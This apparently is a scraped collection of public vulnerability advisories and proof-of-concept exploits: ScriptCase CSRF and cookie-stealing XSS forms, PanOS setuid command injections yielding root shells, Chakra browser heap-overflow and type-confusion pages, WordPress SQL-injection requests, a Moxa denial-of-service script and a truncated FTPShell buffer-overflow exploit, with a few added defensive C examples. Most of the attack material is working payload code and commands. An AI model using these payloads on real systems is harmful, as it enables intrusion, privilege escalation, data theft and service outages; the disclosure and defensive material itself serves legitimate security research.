<input type="hidden" name="privBox%5B%5D" value="Priv_Ctrl">
<input type="hidden" name="privBox%5B%5D" value="Priv_Filt">
<input type="hidden" name="privBox%5B%5D" value="Priv_Edit">
<input type="hidden" name="privBox%5B%5D" value="Priv_Menu">
<input type="hidden" name="privBox%5B%5D" value="Priv_ReportPdf">
<input type="hidden" name="privBox%5B%5D" value="Priv_DbManager">
<input type="hidden" name="privBox%5B%5D" value="Priv_DbConvert">
<input type="hidden" name="privBox%5B%5D" value="Priv_SQLBuilder">
<input type="hidden" name="privBox%5B%5D" value="Priv_Connection">
<input type="hidden" name="hidden" value="New User">
<script> document.forms[0].submit()</script>
</form>


[CSRF mysql connect creation wizard]

<form action="
http://127.0.0.1:8081/scriptcase/devel/iface/admin_sys_allconections_create_wizard.php" method="post">
<input type="hidden" name="ajax" value="S"/>
<input type="hidden" name="set_charset" value="S"/>
<input type="hidden" name="dbms" value="mysql"/>
<input type="hidden" name="sgdb" value="pdo_mysql"/>
<input type="hidden" name="exit" value="S"/>
<input type="hidden" name="host" value="127__DOT__0__DOT__0__DOT__1:3306"/>
<input type="hidden" name="usr" value="root"/>
<input type="hidden" name="pwd" value=""/>
<input type="hidden" name="db" value="mysql"/>
<script>document.forms[0].submit()</script>
</form>



[Cross Site Scripting] - Successful in Firefox

XSS 1)

http://127.0.0.1:8081/scriptcase/devel/iface/app_import.php?option=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


XSS 2)

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


XSS 3)

<form action="http://127.0.0.1:8081/scriptcase/devel/iface/generate.php"
method="post">
<input type="hidden" name="compile_app_ajax" value="S"/>
<input type="hidden" name="gen_option" value="console"/>
<input type="hidden" name="targ_frame" value="_self"/>
<input type="hidden" name="console" value="yes"/>
<input type="hidden" name="ajax_cod_apls"
value="<script>alert(document.cookie)</script>"/>
<script>document.forms[0].submit()</script>
</form>


XSS 4)

<form action="http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php"
method="post">
<input type="hidden" name="nOpc" value="1">
<input type="hidden" name="nOpr" value="0">
<input type="hidden" name="nColOrd" value="1">
<input type="hidden" name="nLogin" value="">
<input type="hidden" name="nFiltro" value="2">
<input type="hidden" name="filtroTipo" value="2">
<input type="hidden" name="filtroTexto"
value='"/><script>alert(document.cookie)</script>'>
<input type="hidden" name="nrLinhas" value="10">
<input type="hidden" name="nrInicio" value="0">
<input type="hidden" name="maxReg" value="1">
<script>document.forms[0].submit()</script>
</form>



[Local Privilege Escalations]

Proof.

C:\Program Files (x86)\NetMake\v81\components>cacls * | findstr Everyone | more
C:\Program Files (x86)\NetMake\v81\components\apache Everyone:(ID)F

Everyone:(OI)(CI)(IO)(ID)
C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x64.msi
Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x86.msi
Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\components\php Everyone:(ID)F
Everyone:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\NetMake\v81\wwwroot>cacls * | findstr Everyone | more
C:\Program Files (x86)\NetMake\v81\wwwroot\favicon.ico Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\index.php Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\robots.txt Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase Everyone:(ID)F

Everyone:(OI)(CI)(IO)(ID)F



[User Account Enumeration / Token Bypass]

First off the stupid token used on the login FORM e.g. "form_login=<TOKEN>"
is totally useless you can put anything you like in it
and the application will happily process the request.


CURL Enumeration 1)
curl -i -v -X POST 'http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand=' \
  -d field_user=BOZO -d field_pass=1 -d ajax=nm -d option=login \
  -d form_login=STUPID-TOKEN -d language=en_US

HTTP Response:
"error1:The login name provided is not registered on the system."

CURL Enumeration 2)
curl -i -v -X POST 'http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand=' \
  -d field_user=admin -d field_pass=1 -d ajax=nm -d option=login \
  -d form_login=STUPID-TOKEN -d language=en_US

HTTP Response:
"error1:The password is incorrect."

Either way we know when we hit a valid account.



Disclosure Timeline:
=========================================
Vendor Notification: October 13, 2016
Vendor acknowledgement: October 14, 2016
Vendor request POC video: October 14, 2016
Sent vendor video link: October 14, 2016
Request update from vendor: October 17, 2016
Vendor reply: "under review"
Vendor requests video again: October 25, 2016
Request update from vendor: October 30, 2016
Vendor reply: "No information"
Request ETA: November 7, 2016
Request status: November 14, 2016
Vendor Unresponsive No More Replies
November 20, 2016 : Public Disclosure



Exploitation Technique:
=======================
Remote / Local



Severity Level:
================
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68

PanOS uses a modified version of the appweb3 embedded webserver, it's used for
a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:

char *mprItoa(char *buf, int size, int64 value, int radix);

https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463

The size parameter is documented to be the size of the buffer at *buf, but if
the value exceeds that it will write one more byte than that as a nul
terminator.

Note that appweb3 has been EOL since 2012 and no longer receives security
updates and is not supported by the developer, so security maintenance is the
responsibility of Palo Alto Networks. It seems crazy to ship an EOL web server,
but whatever.

I've found an unauthenticated php script that an attacker can force to invoke
mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
called like so:

/unauth/php/errorPage.php?code=1e16

This example should corrupt the stored GOT pointer, resulting in some
unexpected routine being called on the attacker-controlled MaResponse object,
and crashing with some heap corruption.

*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
======= Backtrace: =========
/lib/libc.so.6[0xf7ee8786]
/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
/lib/libpthread.so.0[0xf6e9b6e1]
/lib/libc.so.6(clone+0x5e)[0xf7f52aee]
======= Memory map: ========
08048000-0804c000 rwxp 00000000 08:02 67709                              /usr/local/bin/appweb3
0804c000-095e5000 rwxp 00000000 00:00 0                                  [heap]
f1c00000-f1cd0000 rwxp 00000000 00:00 0 

etc.
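
The off-by-one described in the report above, as an added illustration that is not appweb's source and not part of the original report: `itoa_unchecked` is a hypothetical routine that bounds only the digits it copies, and `itoa_bounded` is a hardened variant that reserves a byte for the terminator. All names and the 8-byte window are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the bug class; hypothetical names, not appweb code. */

/* Render value in the given radix (2..16, caller-checked) into out, which must
 * hold 65 characters (64 binary digits plus a sign). Returns the character
 * count; no terminator is written. */
static size_t render(char *out, int64_t value, int radix)
{
    static const char digits[] = "0123456789abcdef";
    char rev[65];
    size_t n = 0, i = 0;
    uint64_t u = value < 0 ? (uint64_t)0 - (uint64_t)value : (uint64_t)value;

    do {
        rev[n++] = digits[u % (uint64_t)radix];
        u /= (uint64_t)radix;
    } while (u != 0);
    if (value < 0)
        rev[n++] = '-';
    while (n > 0)
        out[i++] = rev[--n];
    return i;
}

/* Flawed pattern: the digit count is capped at size, but the terminator is
 * then stored at buf[n]. Whenever the value needs size or more characters,
 * n == size and the NUL lands one byte past the declared buffer. */
static size_t itoa_unchecked(char *buf, size_t size, int64_t value, int radix)
{
    char tmp[65];
    size_t len = render(tmp, value, radix);
    size_t n = len < size ? len : size;

    memcpy(buf, tmp, n);
    buf[n] = '\0';                 /* off by one when n == size */
    return n;
}

/* Hardened variant: one byte of size is reserved for the terminator and a
 * value that does not fit is reported (-1) instead of being truncated. */
static int itoa_bounded(char *buf, size_t size, int64_t value, int radix)
{
    char tmp[65];
    size_t len;

    if (buf == NULL || size == 0 || radix < 2 || radix > 16)
        return -1;
    len = render(tmp, value, radix);
    if (len >= size) {
        buf[0] = '\0';
        return -1;
    }
    memcpy(buf, tmp, len);
    buf[len] = '\0';
    return (int)len;
}

/* Converts value into an 8-byte window at the start of a 16-byte arena and
 * reports whether the byte just past the window was overwritten. */
static int canary_clobbered(int use_bounded, int64_t value)
{
    char arena[16];
    const size_t declared = 8;

    memset(arena, 'X', sizeof arena);
    if (use_bounded)
        (void)itoa_bounded(arena, declared, value, 10);
    else
        (void)itoa_unchecked(arena, declared, value, 10);
    return arena[declared] != 'X';
}

int main(void)
{
    /* 1e16, as in the report's example request, needs 17 characters. */
    printf("unchecked clobbers canary: %d\n", canary_clobbered(0, 10000000000000000LL));
    printf("bounded clobbers canary:   %d\n", canary_clobbered(1, 10000000000000000LL));
    return 0;
}
```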
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67

The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:

.text:0804870F C7 44 24 04 78+                mov     dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24                       mov     [esp], eax      ; char **
.text:0804871A E8 0D FE FF FF                 call    _asprintf
.text:0804871F 8B 45 E8                       mov     eax, [ebp+new]
.text:08048722 85 C0                          test    eax, eax
.text:08048724 0F 84 B9 01 00+                jz      loc_80488E3
.text:0804872A 89 04 24                       mov     [esp], eax      ; command
.text:0804872D E8 9A FD FF FF                 call    _system

Which is trying to do this:

  if (setuid(0) < 0)
  {
    fprintf(stderr, "%s: Can't setuid to reboot system\n");
  }
  if (reason) {
   asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
   system(new);
   free(new);
  }

This is trivially exploitable, for example:


$ ls -l /usr/local/bin/root_reboot 
-rwsr-xr-x 1 root root 16275 Oct 17  2014 /usr/local/bin/root_reboot
$ root_reboot --restart '"; bash -i; echo "'
# id
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:

https://securityadvisories.paloaltonetworks.com/Home/Detail/45

However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:

$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67
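
Both root_reboot and root_trace above hand caller-controlled input and the caller's environment to a shell or interpreter from a setuid program. The following added example (not PAN's code and not part of the original reports) shows the usual remedy, fork plus execve with an argv array and a fixed environment; `CLEAN_ENV`, `run_no_shell`, `log_shutdown_reason`, `hostile_env_is_dropped` and the use of /bin/echo as a stand-in for pan_elog are assumptions made for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example (constructed, not PAN code). The child gets this fixed
 * environment and nothing from the caller, so variables such as SHELLOPTS,
 * PS4 or PYTHONPATH never reach the privileged program. */
static char *const CLEAN_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
                                   "LANG=C", NULL };

/* fork + execve with an argv array: no shell parses the arguments.
 * Captures up to outlen-1 bytes of the child's stdout in out.
 * Returns the child's exit status, or -1 on any failure. */
static int run_no_shell(const char *path, char *const argv[],
                        char *out, size_t outlen)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;

    if (outlen == 0 || pipe(fds) != 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                       /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execve(path, argv, CLEAN_ENV);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Shell-free equivalent of the logging call quoted in the report. elog_path
 * is a parameter only so the demo can substitute /bin/echo for pan_elog. */
static int log_shutdown_reason(const char *elog_path, const char *reason,
                               char *out, size_t outlen)
{
    char msg[256];
    int n = snprintf(msg, sizeof msg,
                     "The system is shutting down due to %s.", reason);
    if (n < 0 || (size_t)n >= sizeof msg)
        return -1;                        /* refuse over-long reasons */
    char *argv[] = { (char *)elog_path, "-i", "1", "-e", "3", "-s", "4",
                     "-m", msg, NULL };
    return run_no_shell(elog_path, argv, out, outlen);
}

/* Plants the variables used in the two reports in the caller's environment,
 * runs /usr/bin/env through run_no_shell, returns 1 if none of them leaked. */
static int hostile_env_is_dropped(void)
{
    char out[4096];
    char *argv[] = { "env", NULL };

    setenv("SHELLOPTS", "xtrace", 1);
    setenv("PS4", "$(id)", 1);
    setenv("PYTHONPATH", "/tmp", 1);
    if (run_no_shell("/usr/bin/env", argv, out, sizeof out) != 0)
        return -1;
    return !strstr(out, "SHELLOPTS") && !strstr(out, "PS4") &&
           !strstr(out, "PYTHONPATH");
}

int main(void)
{
    char out[512];

    printf("hostile environment dropped: %d\n", hostile_env_is_dropped());
    if (log_shutdown_reason("/bin/echo", "\"; id; echo \"", out, sizeof out) == 0)
        printf("argv reached the child as: %s", out);
    return 0;
}
```

Because no shell is involved, the quote characters in the reason string arrive in the child as ordinary bytes of one argument, so a character filter like the one described in the report is no longer what the helper's safety depends on.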
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=934

There is a heap overflow in Array.splice in Chakra.

When an array is spliced, an overflow check is performed, but ArraySpeciesCreate, which can execute code and alter the array, is called after this. This can allow an Array with boundaries that cause integer overflows to be spliced, leading to heap overflows in several situations.

A minimal PoC is as follows and a full PoC is attached.

var a = [];

class dummy{}

a.length = 200000;
a.fill(7, 10000, 10200);

var o = {};

Object.defineProperty(o, 'constructor', {
    get: function() {
      a.length = 0xfffffffe;
      var k = [];
      k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
      return dummy;
    }
  });

a.__proto__ = o;

var q = [];
q.length = 500;
q.fill(7.7);

var j = [];

a.length = 0xfffffffe - 500;

j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;

This PoC is a bit unreliable, it may need to be refreshed a few times to crash.
-->

<html>
<head>
<meta http-equiv="refresh" content="1">
</head> 

<body>
<script>


var a = [];

class dummy{}


a.length = 200000;
a.fill(7, 10000, 10200);

var o = {};
  Object.defineProperty(o, 'constructor', {
    get: function() {
      a.length = 0xfffffffe;
      var k = [];
      k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
      return dummy;
    }
  });

a.__proto__ = o;

var q = [];
q.length = 500;
q.fill(7.7);

var j = [];

a.length = 0xfffffffe - 500;


j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;


</script>
</body>
</html>
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=925

There is an overflow when reversing arrays in Chakra.

On line 5112 of JavascriptArray::EntryReverse, the length of the array is fetched and stored. It is then passed as a parameter into JavascriptArray::ReverseHelper, which then calls FillFromPrototypes, which can change the size of the array. If the size of the array is set to be larger than it was when the length was fetched, the calculation of the array segment head left value on line 5219:

     seg->left = ((uint32)length) - (seg->left + seg->length);

Can become a very large value (as length is larger than seg->length and seg->left is generally 0). This can cause the segment length to become larger than the segment size the next time SparseArraySegmentBase::EnsureSizeInBound is called, as the method contains the following code:

        uint32 nextLeft = next ? next->left : JavascriptArray::MaxArrayLength;
        Assert(nextLeft > left);

        if(size != 0)
        {

            size = min(size, nextLeft - left);
        }

nextLeft can be smaller than the segment length if next is null and left is very large, leading size to be set to a small value which is less than the segment length. Many other methods, including setting an element of an array assume that size is less than length, and often allocate size bytes then copy length bytes, leading to an overflow if length is actually more than size.

A minimal PoC is as follows:

var a = [1];
a.length = 1000;
var j = [];

var o = {};
  Object.defineProperty(o, '1', {
    get: function() {
      a.length = 1002;
      j.fill.call(a, 7.7);
      return 2;
    }
  });

a.__proto__ = o;

var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;

A full PoC is attached. Note that this PoC sometimes needs to be refreshed a few times to cause a crash.
-->

<html>
<head><meta http-equiv="refresh" content="1">
</head>
<body>
<script>

var a = [1];
a.length = 1000;
var j = [];


var o = {};
  Object.defineProperty(o, '1', {
    get: function() {
      //alert('get!');
      a.length = 1002;
      j.fill.call(a, 7.7);
      return 2;
    }
  });

a.__proto__ = o;

var place = [];
for(var i = 0; i < 10; i++){
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
var q = [1,2,3,4,5,6,7,8,9,10];
place.push(q);
}
//alert(place.join());

</script>
</body>
</html>
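
The arithmetic behind the reverse overflow described above, as an added example that is not part of the original report and is not Chakra source: it replays the PoC's numbers through the two quoted calculations and shows one possible guard. `MAX_ARRAY_LENGTH = 0xFFFFFFFF`, the `segment` struct, the segment state after the getter and all function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the two calculations quoted in the report, not Chakra
 * source. Assumption: MAX_ARRAY_LENGTH stands in for
 * JavascriptArray::MaxArrayLength and is taken to be 0xFFFFFFFF. */
#define MAX_ARRAY_LENGTH 0xFFFFFFFFu

struct segment {
    uint32_t left;     /* index of the first element held by the segment */
    uint32_t length;   /* elements in use */
    uint32_t size;     /* elements allocated */
};

/* The quoted line 5219, using the length captured before the getter ran. */
static uint32_t reversed_left(uint32_t captured_length, const struct segment *seg)
{
    return captured_length - (seg->left + seg->length);   /* wraps if stale */
}

/* The quoted EnsureSizeInBound clamp for the case next == NULL. */
static uint32_t clamp_size(uint32_t size, uint32_t left)
{
    uint32_t room = MAX_ARRAY_LENGTH - left;

    if (size != 0 && room < size)
        size = room;
    return size;
}

/* One possible guard (not the vendor's fix): refuse to compute the new left
 * when the segment no longer fits inside the captured length, so the caller
 * can re-read the length or bail out. Returns 0 on success, -1 otherwise. */
static int reversed_left_checked(uint32_t captured_length,
                                 const struct segment *seg, uint32_t *out)
{
    uint64_t end = (uint64_t)seg->left + seg->length;

    if (end > captured_length)
        return -1;
    *out = captured_length - (uint32_t)end;
    return 0;
}

/* Replays the PoC's numbers: length 1000 is captured, then the getter grows
 * the array to 1002 and fills it. Returns 1 if size ends up below length. */
static int poc_breaks_invariant(void)
{
    struct segment seg = { 0, 1002, 1002 };   /* constructed state after the getter */

    seg.left = reversed_left(1000, &seg);
    seg.size = clamp_size(seg.size, seg.left);
    return seg.size < seg.length;
}

int main(void)
{
    struct segment seg = { 0, 1002, 1002 };
    uint32_t left = 0;

    printf("stale left:        0x%08x\n", (unsigned)reversed_left(1000, &seg));
    printf("size after clamp:  %u\n", (unsigned)clamp_size(1002, reversed_left(1000, &seg)));
    printf("size < length:     %d\n", poc_breaks_invariant());
    printf("guard rejects it:  %d\n", reversed_left_checked(1000, &seg, &left) == -1);
    return 0;
}
```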
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=922

There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:


var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{

	constructor(){

		return d;
        }
}

class MyArray extends Array {

  static get [Symbol.species]() { 
  return dummy; 
}
}

var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);

function test(i){

	return true;	
}


a.__proto__ = MyArray.prototype;

var o = a.filter(test);
var h = [];

for(item in o){

	var n = new Number(o[item]);
	if (n < 0){
		n = n + 0x100000000;
	}
	h.push(n.toString(16));

}

alert(h);

<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{

	constructor(){
		alert("in constructor");
		return d;
        }

}

class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() { 

	alert("get");
        b[0] = {};
  return dummy; }
}

var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);


function test(i){

	return true;	

}



a.__proto__ = MyArray.prototype;

var o = a.filter(test);
alert(o);
var h = [];

for(item in o){

	var n = new Number(o[item]);
	if (n < 0){
		n = n + 0x100000000;
	}
	h.push(n.toString(16));

}

alert(h);

</script></body></html>

https://bugs.chromium.org/p/project-zero/issues/detail?id=922#c1

I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
-->

<html>
<body>
<script>

var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{

	constructor(){
		alert("in constructor");
		return d;
        }

}

class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() { 

	alert("get");
        b[0] = {};
  return dummy; }
}

var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);

for(var i = 0; i < 0x200000; i++){
    a[i] = i;

}

function test(i){

	return true;	

}



a.__proto__ = MyArray.prototype;

var o = a.filter(test);
alert(o);
var h = [];

for(item in o){

	var n = new Number(o[item]);
	if (n < 0){
		n = n + 0x100000000;
	}
	h.push(n.toString(16));

}

alert(h);

</script>
</body>
</html>
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=945

JavascriptArray::FillFromPrototypes is a method that is used by several Javascript functions available in the browser to set the native elements of an array to the values provided by its prototype. This function calls JavascriptArray::ForEachOwnMissingArrayIndexOfObject with the prototype of the object as a parameter, and if the prototype of the object is an array, it assumes that it is a Var array. While arrays are generally converted to var arrays if they are set as an object's prototype, if an object's prototype is a Proxy object, it can return a parent prototype that is a native int array. This can lead to type confusion, allowing an integer to be treated as an absolute pointer, when JavascriptArray::FillFromPrototypes is called. A minimal PoC is as follows, and a full PoC is attached.

var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);

var handler = {
    getPrototypeOf: function(target, name){
	return a;
    }
};

var p = new Proxy([], handler);
var b = [{}, [], "natalie"];

b.__proto__ = p;
b.length = 4;

a.shift.call(b);
 // b[2] is type confused
-->

<html>
<body>
<script>

var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);

var handler = {
    getPrototypeOf: function(target, name){
       // print("get proto");
	return a;
    }
};

var p = new Proxy([], handler);
var b = [{}, [], "natalie"];

b.__proto__ = p;
b.length = 4;

a.shift.call(b);
print(a.shift.call(b[2]));

</script>
</body>
</html>
            
# Exploit Title: Product Catalog 8 1.2 Plugin WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/
# Software Link: https://wordpress.org/plugins/product-catalog-8/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.2
# Tested on: Windows 8.1

1 - Description:

$_POST['selectedCategory'] is not escaped.
UpdateCategoryList() is accessible to any user.

http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/

2 - Proof of Concept:

<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>

3 - Timeline:

12/11/2016 - Discovered
12/11/2016 - vendor not found

-- 
Regards

Lenon Leite
            
# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.1.1
# Tested on: Windows 8.1

1 - Description:

$_GET['uid'] is not escaped. The URL is accessible to any user.
I will have to find a post or page that uses the plugin through its shortcode.

http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/


2 - Proof of Concept:

http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1


3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
            
'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: 504137480@qq.com
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02

Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values that crash the program or cause excessive consumption of resources, resulting in a denial-of-service condition.


Vulnerability Discovery Method:
With the help of the kitty fuzzing framework, we are able to find some vulnerabilities in the AspWebServer when it parses HTTP GET requests. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''

import socket
host = '192.168.124.128'    
port = 81

# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()
            
# -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow
# Date: 16/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com
# Author Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Tested on: Windows XP Professional SP 2
# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit

import socket
import sys
import os
import time


def banner():
    banner = "\n\n"
    banner += "  ██████╗████████╗  ███████╗███████╗██████╗  ██████╗     \n"
    banner += " ██╔════╝╚══██╔══╝  ╚══███╔╝██╔════╝██╔══██╗██╔═████╗    \n"
    banner += " ██║        ██║█████╗ ███╔╝ █████╗  ██████╔╝██║██╔██║    \n"
    banner += " ██║        ██║╚════╝███╔╝  ██╔══╝  ██╔══██╗████╔╝██║    \n"
    banner += " ╚██████╗   ██║     ███████╗███████╗██║  ██║╚██████╔╝    \n"
    banner += "  ╚═════╝   ╚═╝     ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝     \n"
    banner += "                                          \n"
    print banner


def usage():
    banner()
    print "[-] Missing arguments\n"
    print "[*] Usage: python FTPShell-exploit.py target_os"
    print "[*] Target types:\n\tWindows XP -> winxp\n\tWindows 7-32bit -> win7_32\n\tWindows 7-64bit -> win7_64\n"
    sys.exit(0)


def exploit(target_eip):
    s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s0ck3t.bind(("0.0.0.0", 21))
    s0ck3t.listen(5)
